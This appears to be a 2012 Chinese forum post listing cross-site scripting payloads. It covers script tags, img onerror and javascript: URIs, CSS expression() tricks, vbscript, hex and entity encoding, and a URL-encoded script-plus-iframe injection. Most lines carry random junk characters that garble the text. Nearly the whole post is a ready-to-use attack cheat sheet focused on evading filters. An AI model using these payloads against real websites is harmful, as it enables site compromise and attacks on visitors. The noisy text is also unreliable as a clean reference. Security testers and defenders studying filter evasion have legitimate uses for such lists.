<script>alert("跨站")</script> (最常用)) i3 _; r6 H6 `4 x. o \
<img scr=javascript:alert("跨站")></img>0 R; g" L7 g1 ]& C* o
<img scr="javascript: alert(/跨站/)></img>
/ q8 v7 R! @' _& l<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
) X, a- }4 P6 t8 d* w<img scr="#" onerror=alert(/跨站/)></img>0 U2 M. v. _9 ^) t) O' ~( F
<img scr="#" style="xss:expression(alert(/xss/));"></img>4 j3 ?& p( ^' |' T+ J
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)4 Y: Q( C" l$ f- P3 D6 ~7 k4 n
<img src=vbscript:msgbox ("xss")></img>0 U, q8 ~/ i$ e& g2 ~; o+ N; {
<style> input {left:expression (alert('xss'))}</style>2 p( N+ u' x" C' e0 d; _
<div style={left:expression (alert('xss'))}></div>
5 N* I8 D/ T) b G$ s! Z$ N<div style={left:exp/* */ression (alert('xss'))}></div>0 r8 A4 {8 R! I" n! `
<div style={left:\0065\0078ression (alert('xss'))}></div>4 y9 e4 r' a9 G. m
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>2 j; `* B2 O% e! v8 P) S
unicode <div style="{left:expRessioN (alert('xss'))}">
D8 F9 g; O) H" _2 S i
) ]; g/ _9 a" J$ L5 L"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
( k- Z& m0 v4 g7 u5 ?% N |
发表于 2012-9-13 17:15:04
收藏
支持
反对